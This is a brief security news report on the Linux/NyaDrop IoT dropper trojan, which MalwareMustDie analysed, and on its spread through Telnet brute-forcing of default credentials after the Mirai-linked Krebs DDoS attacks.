The Krebs DDoS attacks have proven that the IoT landscape is a fertile ground that can breed huge botnets capable of launching massive DDoS assaults. As such, it should be no surprise that malware authors are now focusing their efforts on this sector and putting out new threats in the hopes of building the next Mirai botnet.
One of the latest additions to the IoT malware market is a trojan codenamed Linux/NyaDrop, recently reverse engineered by MalwareMustDie, the same researcher who discovered the Mirai malware.
MalwareMustDie points out in his research that this binary appeared in May, but was somewhat simplistic and not that common. Things changed after the Krebs DDoS attacks, and a new sample has appeared on the market, with the malware’s author most likely drawn back to the IoT landscape by Mirai’s success.
Just like most IoT malware nowadays, NyaDrop’s author relies on brute-forcing Internet-exposed IoT devices using their default credentials.
In a conversation on Twitter, MalwareMustDie tells Softpedia that the attacks happen on the devices’ Telnet ports, which is a common practice in IoT attacks.
If the brute-force attacker manages to authenticate on the device, a script executes a series of automated commands that download and execute the NyaDrop binary.
The NyaDrop trojan is very small in size. This is because the malware is just a “dropper,” a term used to describe malware that downloads other more potent malware.
Employing droppers to download the final payload is a common practice for desktop malware and hasn’t been seen deployed regularly with IoT malware.
NyaDrop’s purpose is to probe the system and decide if to download the actual malware, which is an ELF (Linux-specific) binary called “nya,” hence the malware’s name of NyaDrop.